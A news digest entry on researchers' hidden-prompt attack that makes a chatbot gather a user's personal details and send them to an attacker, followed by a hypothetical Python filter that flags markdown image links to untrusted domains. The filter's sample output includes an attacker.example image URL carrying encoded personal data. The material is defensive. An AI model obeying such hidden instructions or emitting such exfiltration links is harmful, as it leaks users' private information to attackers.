This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

Thursday, October 17, 2024, 12:30 PM, from Wired: Tech.
Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.
https://www.wired.com/story/ai-imprompter-malware-llm/
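
The summary describes an attack in which hidden instructions make the chatbot gather personal details from the conversation and send them to an attacker. The Python sketch below is not the researchers' algorithm; it is a minimal, hypothetical defensive check that assumes one commonly reported exfiltration channel for such attacks: a markdown image link whose URL encodes chat-derived data and points at an attacker-controlled host. All names here (TRUSTED_IMAGE_DOMAINS, flag_suspicious_images, attacker.example) are illustrative assumptions, not anything from the article or the underlying paper.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: domains the chat UI is expected to load images from.
TRUSTED_IMAGE_DOMAINS = {"cdn.example-chat.com"}

# Markdown image syntax: ![alt](url). A frequently discussed exfiltration
# channel in prompt-injection attacks is having the model emit such a link
# whose URL smuggles data pulled from the conversation.
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)\)")


def flag_suspicious_images(model_output: str, max_query_len: int = 64) -> list[str]:
    """Return URLs of markdown images that point to untrusted domains or
    carry unusually long query strings (a possible exfiltration payload)."""
    suspicious = []
    for match in MARKDOWN_IMAGE.finditer(model_output):
        url = match.group("url")
        parsed = urlparse(url)
        untrusted = parsed.hostname not in TRUSTED_IMAGE_DOMAINS
        if untrusted or len(parsed.query) > max_query_len:
            suspicious.append(url)
    return suspicious


if __name__ == "__main__":
    # Illustrative output a compromised assistant might produce: the "image"
    # URL carries encoded personal details out to an attacker's server.
    reply = ("Sure, here is your summary. "
             "![x](https://attacker.example/pixel.png?d=SmFuZSBEb2UsIGphbmVAZXhhbXBsZS5jb20)")
    print(flag_suspicious_images(reply))
```

In practice such a filter would sit between the model's raw output and the chat renderer, so a flagged link can be stripped or rewritten before the client ever requests it; this is a sketch of that idea, not a complete mitigation.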
